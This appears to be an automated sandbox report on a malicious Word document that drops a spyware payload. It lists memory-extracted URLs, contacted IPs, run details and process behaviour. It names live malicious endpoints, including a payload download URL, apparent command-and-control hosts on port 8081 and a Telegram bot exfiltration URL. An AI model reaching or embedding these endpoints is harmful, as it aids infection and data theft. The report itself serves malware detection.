                          http://checkip.dyndns.org/Xswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002465000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.comswagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.entrust.net0DEQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameswagodi78811.scr, 0000000A.00000002.410819357.0000000002101000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 00000016.00000002.427914204.00000000021C1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://download.visualstudswagodi78811.scr, 00000014.00000002.664602794.000000000352D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&igRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.microsoftXT7/windows/2004/02/mit/tastaskeng.exe, 00000015.00000002.662983168.000000000033E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.330KpgRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.orgswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000248D000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002386000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.cEQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchswagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/favicon.icogRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://aborters.duckdns.org:8081swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://meridianresourcellc.top/swagodi.scrllC:EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.google.com/sorry/indexgRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://anotherarmy.dns.army:8081swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://reallyfreegeoip.orgswagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26agRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/search?q=netgRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/sorry/indextestswagodi78811.scr, 00000014.00000002.664602794.0000000003607000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.664602794.000000000351B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.telegram.orgswagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.comXswagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.orgXswagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedswagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.197.72
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          132.226.8.169
                          		unknownUnited States
                          		16989UTMEMUSfalse
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          188.114.97.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          193.122.6.168
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          188.114.96.3
                          		unknownEuropean Union
                          		13335CLOUDFLARENETUSfalse
                          193.122.130.0
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          158.101.44.242
                          		unknownUnited States
                          		31898ORACLE-BMC-31898USfalse
                          104.21.52.88
                          		meridianresourcellc.topUnited States
                          		13335CLOUDFLARENETUStrue
                          132.226.247.73
                          		checkip.dyndns.comUnited States
                          		16989UTMEMUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1483266
                          Start date and time:2024-07-26 23:44:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:30
                          Number of new started drivers analysed:1
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:order072724.docx.doc
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winDOC@25/31@68/10
                          EGA Information:
                          • Successful, ratio: 40%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 243
                          • Number of non-executed functions: 10
                          Cookbook Comments:
                          • Found application associated with file extension: .doc
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer

                          Warnings

                          • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 3408 because there are no executed function
                          • Execution Graph export aborted for target gRpkBp.exe, PID 2060 because it is empty
                          • Execution Graph export aborted for target swagodi78811.scr, PID 3880 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: order072724.docx.doc

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:45:25Task SchedulerRun new task: gRpkBp path: C:\Users\user\AppData\Roaming\gRpkBp.exe
                          17:45:18API Interceptor60x Sleep call for process: EQNEDT32.EXE modified
                          17:45:20API Interceptor1600941x Sleep call for process: swagodi78811.scr modified
                          17:45:22API Interceptor105x Sleep call for process: powershell.exe modified
                          17:45:24API Interceptor3x Sleep call for process: schtasks.exe modified
                          17:45:25API Interceptor194x Sleep call for process: taskeng.exe modified
                          17:45:27API Interceptor984822x Sleep call for process: gRpkBp.exe modified

                          LLM Input / Output

                          InputOutput
                          URL: Office document Model: gpt-4o
                          ```json
{
  "riskscore": 0,
